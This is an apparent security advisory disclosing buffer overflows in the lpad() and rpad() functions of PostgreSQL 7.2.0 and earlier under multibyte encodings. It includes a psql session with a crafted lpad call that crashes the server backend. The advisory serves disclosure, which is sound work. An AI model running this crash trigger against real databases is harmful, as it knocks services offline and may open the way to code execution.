|
|
|
|
| |
PostgreSQL is "an advanced object-relational database management system that supports an extended subset of the SQL standard, including transactions, foreign keys, subqueries, triggers, user-defined types and functions".
A vulnerability in PostgreSQL's lpad() and rpad() allows attacker to cause the program to execute arbitrary code by overflowing an internal buffer. |
| |
Credit:
The information has been provided by Sir Mordred The Traitor.
|
| |
Vulnerable systems:
* PostgreSQL version 7.2.0 and prior
There are two buffer overflows in src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
How to reproduce:
shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# \c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#
The same for rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE, MULE_INTERNAL.
|
|
|
|
|
